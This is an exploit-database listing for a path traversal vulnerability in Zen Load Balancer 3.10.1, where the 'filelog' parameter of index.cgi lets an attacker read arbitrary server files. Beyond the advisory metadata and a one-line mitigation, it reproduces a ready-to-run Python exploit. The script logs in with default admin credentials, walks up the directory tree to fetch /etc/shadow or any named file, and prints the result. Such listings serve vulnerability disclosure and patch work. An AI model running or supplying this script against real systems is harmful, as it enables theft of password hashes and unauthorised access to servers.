header-logo
Suggest Exploit
vendor:
Zen Load Balancer
by:
Basim Alabdullah
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Zen Load Balancer
Affected Version From: 3.10.1
Affected Version To: 3.10.1
Patch Exists: YES
Related CWE: N/A
CPE: a:zenloadbalancer:zen_load_balancer
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Debian8u2
2020

Zen Load Balancer 3.10.1 – ‘index.cgi’ Directory Traversal

The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response. Note that disclosure of the shadow file may allow an attacker to discover users' passwords

Mitigation:

Ensure that user input is validated and sanitized before being used in file operations.
Source

Exploit-DB raw data:

# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
# Date: 2020-04-10
# Exploit Author: Basim Alabdullah
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Debian8u2
#
# Technical Details:
# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
#
# Impact:
# --------
# Successful exploitation could allow an attacker to obtain sensitive
# information.

import requests
import sys

if len(sys.argv) <2:
    print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
    sys.exit(-1)
else:
    files=sys.argv[2]
    url=sys.argv[1]    
    with requests.session() as s:
        urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
        response = s.get(urlz, auth=('admin', 'admin'), verify=False)
        txt=response.text
        print(response.text)

Navigation

Suggest Exploit

Services By CQR